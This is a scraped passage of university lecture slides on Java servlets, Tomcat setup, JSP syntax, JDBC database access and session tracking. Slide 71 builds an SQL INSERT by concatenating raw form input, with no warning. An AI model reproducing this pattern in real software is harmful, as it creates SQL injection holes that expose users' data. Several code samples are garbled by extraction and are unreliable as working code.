  • 54. Java Servlets: Advantages(4/4) Portable Written in Java with a standardized API Servlets written for Microsoft IIS will run on Apache and other Web servers All major Web servers support servlets (directly or via a plug-in) (54/95)
  • 55. Installing Servlet Container(1/3) Servlet Container Tomcat http://jakarta.apache.org/tomcat/index.html Apache software foundation http://www.apache.org for others see http://www.apl.jhu.edu/~hall/java/Servlet-Tutorial/ Servlet-Tutorial-Setup.html (55/95)
  • 56. Installing Servlet Container(2/3) installation tomcat # installation in verzeichnis ’/foo’ cd /foo unzip <path-to-tomcat-archive>/jakarta-tomcat-4.1.12.zip cd jakarta-tomcat-4.1.12 # start tomcat: bin/startup.sh # stop tomcat: bin/shutdown.sh tomcat: http://localhost:8080 or http://<hostname>:8080 (56/95)
  • 57. Installing Servlet Container(3/3) Windows installation with Windows installer Installed as a Windows service Connecting with a Web server (e.g. Apache) Install a Web connector: http://jakarta.apache.org/tomcat/tomcat-4.1-doc/ config/connectors.html Configure Web server Set URL prefixes which will be passed to Tomcat (57/95)
  • 58. Java Servlets - Internal(1/2) Java class extending abstract class javax.servlet.http.HttpServlet Implement public void doGet(request, response) to handle HTTP GET method Other methods (need not be implemented) e.g. public void doPost(request, response) (58/95)
  • 59. Java Servlets - Internal(2/2) servlet template: import java.io.*; import javax.servlet.*; import javax.servlet.http.*; public class SomeServlet extends HttpServlet { public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { // Use "request" to read incoming HTTP headers (e.g. cookies) // and HTML form data (e.g. data the user entered and submitted) // Use "response" to specify the HTTP response line and headers // (e.g. specifying the content type, setting cookies). PrintWriter out = response.getWriter(); // Use "out" to send content to browser } } (59/95)
  • 60. Java Servlets: Hello World(1/5) Example: Hello World! ... public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{ String hello = "Hello World"; response.setContentType("text/html"); PrintWriter writer = response.getWriter(); writer.println("<html>"); writer.println("t<head>"); writer.println( "tt<link rel = "stylesheet" type = "text/css" href = "style.css" writer.println("tt<title>" + hello + "</title>"); writer.println("t</head>"); writer.println("t<body>"); writer.println(hello + " (" + (new Date()) + ")"); writer.println("t</body>"); writer.println("</html>"); } ... (60/95)
  • 61. Java Servlets: Hello World(2/5) Installing and running the HelloWorldServlet Tomcat web applications (in webapp directory) |-mmis-servlets | | | |-WEB-INF | | | |-web.xml | | | |-lib | | | | | |-*.jar | | | |-classes | | | | | |-*.class (61/95)
  • 62. Java Servlets: Hello World(3/5) web.xml declares all servlets in a particular Web application <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.2//EN" "http://java.sun.com/j2ee/dtds/web-app_2_2.dtd"> <web-app> <servlet> <servlet-name>Hello World Servlet</servlet-name> <description>Hello World from a Java servlet</description> <servlet-class>mmis.hello.HelloWorldServlet</servlet-class> </servlet> ... <servlet-mapping> <servlet-name>Hello World Servlet</servlet-name> <url-pattern>HelloWorld</url-pattern> </servlet-mapping> </web-app> (62/95)
  • 63. Java Servlets: Hello World(4/5) Hello World: http://coronet.iicm.edu/mmis-servlets/HelloWorld Source code: http://coronet.iicm.edu/mmis/examples/java/hello/ HelloWorldServlet.java (63/95)
  • 64. Java Servlets: Hello World(5/5) Element Construction Set (Apache project) http://jakarta.apache.org/ecs/ Supports generation of HTML and XML No need for numerous println statements Copy ecs.jar into lib directory! Hello World with ECS: http://coronet.iicm.edu/mmis-servlets/ECSHelloWorld Source code: http://coronet.iicm.edu/mmis/examples/java/hello/ ECSHelloWorldServlet.java (64/95)
  • 65. Java Servlets: HTTP and Environment Variables(1/2) Similar communication mechanism between a Java servlet and the Web server All communication wrapped in a high-level Java objects (e.g. HttpServle- tRequest) request.getRemoteAddr() request.getRemoteHost() request.getRemoteUser() (65/95)
  • 66. Java Servlets: HTTP and Environment Variables(2/2) CGI Variables: http://coronet.iicm.edu/mmis-servlets/CGIVar Source code: http://coronet.iicm.edu/mmis/examples/java/env/ CGIVarServlet.java HTTP Headers: http://coronet.iicm.edu/mmis-servlets/Header Source code: http://coronet.iicm.edu/mmis/examples/java/env/ HeaderServlet.java (66/95)
  • 67. Java Servlets: Handling Forms(1/2) All form parsing done automatically Invoke a method on the instance of HttpServletRequest class to obtain parameters String name = request.getParameter("name"); (67/95)
  • 68. Java Servlets: Handling Forms(2/2) Example with GET: http://coronet.iicm.edu/mmis/examples/java/form/form_ get.html Example with POST: http://coronet.iicm.edu/mmis/examples/java/form/form_ post.html Source code: http://coronet.iicm.edu/mmis/examples/java/form/ FormServlet.java (68/95)
  • 69. Java Servlets: Database Manipulation(1/5) Advantage of Java: great support for database connectivity Similar to PHP Java Database Connectivity - JDBC http://java.sun.com/products/jdbc/index.html Drivers for many DBMS available For MySQL copy mysql-connector-java.jar into lib directory Advanced features: Persistent database connections Huge advantage over CGI! (69/95)
  • 70. Java Servlets: Database Manipulation(2/5) Example: Inserting and retrieving data from MySQL database Form for inserting data: http://coronet.iicm.edu/mmis/examples/java/mysql/form. html (70/95)
  • 71. Java Servlets: Database Manipulation(3/5) Connection connection = DriverManager.getConnection( "jdbc:mysql://" + dbms_host_ + "/" + dbms_db_, dbms_username_, dbms_password_); Statement statement = connection.createStatement(); int row = statement.executeUpdate( "INSERT INTO " + dbms_db_table_ + " VALUES(’" + name + "’,’" + second_name + "’,’" + nr + "’,’" + study_field + "’,’null’)"); Inserting data with Java (source): http://coronet.iicm.edu/mmis/examples/java/mysql/ RegisterStudentServlet.java (71/95)
  • 72. Java Servlets: Database Manipulation(4/5) Retrieving data with Java Connection connection = DriverManager.getConnection(...); Statement statement = connection.createStatement(); ResultSet result = statement.executeQuery( "SELECT * FROM " + dbms_db_table_); ... while(result.next()){ String name = result.getString("name"); ... TR table_row = new TR(true); table_row.addElement((new TD(true)).addElement(name)); ... } (72/95)
  • 73. Java Servlets: Database Manipulation(5/5) Retrieving data with Java http://coronet.iicm.edu/mmis-servlets/Registration Retrieving data with Java (source): http://coronet.iicm.edu/mmis/examples/java/mysql/ RegistrationServlet.java (73/95)
  • 74. Java Servlets: XML Manipulation(1/2) Java SE 1.4+ includes library for manipulating XML data Element root = document.createElement("Course"); document.appendChild(root); ... Connection connection = DriverManager.getConnection(...); Statement statement = connection.createStatement(); ResultSet result = statement.executeQuery("SELECT * FROM " + dbm while(result.next()){ String name = result.getString("name"); Element el_name = document.createElement("name"); Text name_text = document.createTextNode(name); el_name.appendChild(name_text); student.appendChild(el_name); } (74/95)
  • 75. Java Servlets: XML Manipulation(2/2) Retrieving data (as XML) with Java: http://coronet.iicm.edu/mmis-servlets/XMLRegistration Retrieving data (as XML) with Java (source): http://coronet.iicm.edu/mmis/examples/java/mysql/ XMLRegistrationServlet.java (75/95)
  • 76. Java Servlets: Tutorials and Resources Java Servlets Introductory Tutorial: http://www.apl.jhu.edu/~hall/java/Servlet-Tutorial/ Book: Marty Hall, Core Servlets and JavaServer Pages, Sun Press/Pren- tice Hall (http://www.coreservlets.com) JDBC Tutorial: http://java.sun.com/docs/books/tutorial/jdbc/index.html Developer Library (includes form multipart parser) http://www.servlets.com/cos/index.html Developers Resources http://www.servlets.com/index.tea (76/95)
  • 77. Java Server Pages (JSP) Combine static HTML with Java Code <HTML> <HEAD> <TITLE>JSP-Hello World</TITLE> </HEAD> <BODY> Static Hello World<BR> <% out.print("Dynamic Hello World :-)<br>"); %> </BODY> </HTML> HelloWorld JSP: http://coronet.iicm.edu/mmis-servlets/jsp/helloworld.jsp (77/95)
  • 78. Java Server Pages (JSP) - Internal JSP pages are converted to Java classes <tomcat-dir>/work/localhost/helloworld$jsp.java classname: helloworld$jsp: [...] public void _jspService(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException { [...] response.setContentType("text/html;charset=8859_1"); [...] out.write("<HTML>rn <HEAD>rn <TITLE>JSP-Hello World</TITLE>rn </HEAD>rn <BODY>rn"); [...] } [...] (78/95)
  • 79. JSP Elements(1/7) JSP expression <%= "Hello World <BR>" %> XML syntax: <jsp:expression> "HelloWorld<BR>" </jsp:expression> JSP expression evaluated and printed out! (79/95)
  • 80. JSP Elements(2/7) JSP Scriplet <% out.print("Hello World <BR>"); %> XML syntax: <jsp:scriptlet> out.print("HelloWorld<BR>"); </jsp:scriptlet> JSP scriplet code is inserted into the service method and executed Combining JSP scriplet and JSP expression: <% String hello2 = "Hello World <BR>"; %> <%= hello2 %> (80/95)
  • 81. JSP Elements(3/7) JSP Declaration <%! private int access_count = 0; %> XML syntax: <jsp:declaration> privateintaccess_count=0 </jsp:declaration> JSP declaration code is inserted outside the service method (81/95)
  • 82. JSP Elements(4/7) JSP Page Directive <%@ page import = "java.util.*" %> XML syntax: <jsp:directive.page import=”java.util.∗”/> Directions to the servlet engine about general page setup import, session, buffer, mimeType, etc. (82/95)
  • 83. JSP Elements(5/7) JSP comments JSP Include Directive (includes other files at run-time) JSP Elements to handle Java Beans (83/95)
  • 84. JSP Elements(6/7) JSP predefined variables request, response out session config, pageContext (84/95)
  • 86. Servlets, CGI, JSP, PHP, ... - Problems!(1/3) Common problems of all server-side generated Web applications Mixing of content and presentation Hard to decouple this in scripting languages Script always embeded inside HTML code (86/95)
  • 87. Servlets, CGI, JSP, PHP, ... - Problems!(2/3) Servlets have this problem also Presentation designer needs to program in Java Possible solution Dump content as XML, appply XSLT (87/95)
  • 88. Servlets, CGI, JSP, PHP, ... - Problems!(3/3) Java Web Frameworks try to solve this problem Coocon (XML Publishing framework) http://xml.apache.org/cocoon/index.html Struts http://jakarta.apache.org/struts/index.html More on Java Web Frameworks in MMIS 2 (88/95)
  • 89. Servlets, CGI, JSP, PHP, ... - What to take? Depends on application requirements (e.g. database connectivity, perfor- mance, etc.) Depends on know-how, taste, etc. Depends on how dynamic is Web application Less dynamic content - JSP, PHP, etc. Gateway to existing Java application (more dynamic content) - Java servlets (89/95)
  • 90. Session Tracking(1/5) HTTP is connection-less: one connection per request Information about user/session is lost whenever the connection is closed Often necessary to keep track about the session (e.g. online shop) (90/95)
  • 91. Session Tracking(2/5) Keep track with: Cookies Hidden form fields: <INPUT type=”HIDDEN”name=”sessionInfo”value=”username”> Url-rewriting: e.g. http://coronet.iicm.edu/mmis-servlets/Session; jsessionid=34D53231C1140018A422F540E9379927 (91/95)
  • 92. Session Tracking(3/5) Cookies Strings sent from server to Web browser Stored on a client side database, files or in memory Sent back from browser to the Web server in HTTP-header (92/95)
  • 93. Session Tracking(4/5) Used to store the state of communication between a client and the server Server sets the read rigths for a cookie (i.e. who can read the cookie) Commercial sites use cookies to create user profiles (e.g. Ad-ware) Possible to switch off (by request, none at all, ...) (93/95)
  • 94. Session Tracking(5/5) High level interfaces in PHP, Java Servlets API Java servlets API manages sessions with cookies or url rewriting Transparent to programmer Session example: http://coronet.iicm.edu/mmis-servlets/Session Session example (source): http://coronet.iicm.edu/mmis/examples/java/session/ SessionServlet.java (94/95)
  • 95. Distributed Programming on the Web Very hot topic right now .NET from Microsoft Web services More on Web services in MMIS 2 (95/95)